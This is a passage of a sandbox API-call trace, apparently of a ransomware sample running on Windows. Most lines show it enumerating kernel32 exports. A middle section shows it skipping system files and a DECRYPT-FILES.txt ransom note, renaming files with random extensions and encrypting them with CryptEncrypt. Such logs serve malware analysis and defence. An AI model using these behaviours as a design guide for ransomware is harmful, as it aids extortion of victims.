returned 18 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.322] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.322] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.322] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.322] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.322] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.322] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.322] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.322] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.322] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.322] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.322] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.322] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.322] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.322] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.322] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.322] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.322] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.322] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.323] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.323] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.323] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.323] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.323] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.323] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.323] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.323] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.323] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.323] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.323] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.323] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.323] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.323] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.323] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.323] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.323] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.323] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.323] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.324] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.324] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.324] lstrlenA (lpString="DELETEATOM") returned 10 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.324] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.324] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.324] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.324] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.324] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.324] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.324] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.324] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.324] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.324] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.324] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.324] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.324] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.324] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.324] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.325] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.325] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.325] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.325] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.325] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.325] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.325] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.325] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.325] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.325] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.325] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.325] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.325] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.325] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.325] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.325] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.325] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.325] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.325] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.326] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.326] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.333] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.333] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.333] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.333] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.333] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.333] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.333] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.333] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.333] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.333] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.333] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.334] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.334] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.334] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.334] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.334] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ") returned 118 [0182.334] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ.LRnt") returned 123 [0182.334] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.ym1yq"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ.LRnt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.ym1yq.lrnt"), dwFlags=0x0) returned 1 [0182.340] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.340] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.340] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.340] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac135240, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac135240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac135240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.341] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.341] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac181500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink.ioFfZl", cAlternateFileName="DESKTO~1.IOF")) returned 1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="DECRYPT-FILES.txt") returned 1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="autorun.inf") returned 1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="boot.ini") returned 1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="desktop.ini") returned -1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="ntuser.dat") returned -1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="iconcache.db") returned -1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="bootsect.bak") returned 1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="ntuser.dat.log") returned -1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="thumbs.db") returned -1 [0182.341] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ioFfZl", lpString2="Bootfont.bin") returned 1 [0182.341] lstrlenW (lpString="Desktop (create shortcut).DeskLink.ioFfZl") returned 41 [0182.341] lstrcmpiW (lpString1="ioFfZl", lpString2="lnk") returned -1 [0182.341] lstrcmpiW (lpString1="ioFfZl", lpString2="exe") returned 1 [0182.341] lstrcmpiW (lpString1="ioFfZl", lpString2="sys") returned -1 [0182.341] lstrcmpiW (lpString1="ioFfZl", lpString2="dll") returned 1 [0182.341] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.341] lstrlenW (lpString="Desktop (create shortcut).DeskLink.ioFfZl") returned 41 [0182.341] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0182.341] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Desktop (create shortcut).DeskLink.ioFfZl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl" [0182.341] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.ioffzl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.344] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=271) returned 1 [0182.344] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.344] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.345] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.345] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0182.345] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.345] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0182.345] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.346] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.346] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.346] CloseHandle (hObject=0x280) returned 1 [0182.346] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.346] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0182.347] CloseHandle (hObject=0x0) returned 0 [0182.347] CloseHandle (hObject=0x27c) returned 1 [0182.347] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.348] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.348] GetTickCount () returned 0x1134f97 [0182.348] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.348] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.348] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.348] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.348] lstrlenA (lpString="kernel32.dll") returned 12 [0182.349] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.349] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.349] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.349] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.349] lstrlenA (lpString="ADDATOMA") returned 8 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.349] lstrlenA (lpString="ADDATOMW") returned 8 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.349] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" 